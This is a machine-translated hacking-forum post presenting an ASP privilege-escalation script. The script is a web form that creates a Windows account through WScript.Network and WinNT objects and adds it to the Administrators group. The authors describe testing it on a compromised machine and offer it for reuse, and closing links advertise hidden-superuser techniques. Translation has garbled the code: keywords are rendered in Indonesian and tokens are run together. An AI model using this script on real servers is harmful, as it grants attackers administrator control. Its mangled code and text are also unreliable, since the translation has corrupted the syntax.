Menambahkan kode .Asp pengguna super [Layar Biru Asli, Kevin Improvement, MS tidak dipublikasikan kerentanan

Menambahkan kode .Asp pengguna super [Layar Biru Asli, Kevin Improvement, MS tidak dipublikasikan kerentanan]

Penulis: Layar Biru, Artikel Kevin Sumber: Titik Beku Extreme

Sebenarnya, Kevin dan saya mengujinya di broiler saya minggu lalu, dan Hippo Epic. Hasilnya adalah bahwa pengguna grup administrator berhasil ditambahkan di bawah izin pengguna (walaupun saya tidak percaya mata saya).

Terakhir kali Kevin tidak mengatakan apa -apa, saya tidak berani mempostingnya ... sekarang saya melihatnya mempostingnya di blognya, jadi saya mentransfernya (itu sedikit lebih baik daripada ketika saya mengujinya terakhir kali, dan saya menambahkan formulir). Sekarang saya beruntung untuk semua orang `` `

Bagaimanapun, kodenya benar, tetapi jarang berhasil, itu tergantung pada keberuntungan. . Haha, langkah selanjutnya saya ingin mengintegrasikannya ke lautan. hey-hey.

Salinan kode adalah sebagai berikut:

<Head> .Network Obyek Skrip Peningkatan Eksploitasi Alat Eksploitasi </head>

<formaction = "useradd.asp" metode = post>

Pengguna: <inputName = "nama pengguna" type = "text" value = "kevin1986"> <br>

Kata sandi: <inputName = "passwd" type = "password"> <br>

<inputType = "Kirim" value = "add">

</form>

<%@codepage = 936

OnerrorresumeNext

ifrequest.serverVariable ("remote_addr") <> "127.0.0.1" Lalu

response.write "ip! sn0tright"

kalau tidak

ifRequest ("nama pengguna") <> "" Lalu

nama pengguna = permintaan ("nama pengguna")

passwd = request ("passwd")

Response.expires = 0

Session.timeout = 50

Server.ScriptTimeout = 3000

setlp = server.createObject ("wscript.network")

oz = "winnt: //" & lp.computername

Setob = getObject (oz)

Setoe = getObject (oz & "/administrator, grup")

Setod = ob.create ("pengguna", nama pengguna)

od.setpasswordpasswd

od.setinfo

oe.addoz & "/" & nama pengguna

iferrthen

response.write "Hei ~~ Anda tidak boleh membeli 6+1 hari ini ... lebih baik menghemat 2 yuan untuk membeli sebotol Coke ..."

kalau tidak

ifinstr (server.createObject ("wscript.shell"). exec ("cmd.exe/cnetuser" & username.stdout.readall), "login terakhir")> 0then

Response.write "Meskipun tidak ada kesalahan, tampaknya itu belum berhasil ditetapkan. Anda harus sangat tertekan."

kalau tidak

Response.write "OMG!" & Username & "Akun sebenarnya menjadi! Ini adalah celah yang tidak diketahui. 5.000.000RMB adalah milik Anda."

endif

endif

kalau tidak

response.write "Harap masukkan nama pengguna"

endif

endif

%>

Artikel yang mungkin menarik bagi Anda:

Tolak sistem manajemen host virtual ekstra bintang, desktop jarak jauh Freehostrunat pengguna super, tingkatkan sistem keamanan, berbagai metode penambahan pengguna super tersembunyi, ambil kata sandi pengguna super Redhat Linux 7.2, metode penambahan pengguna super ke pengguna biasa.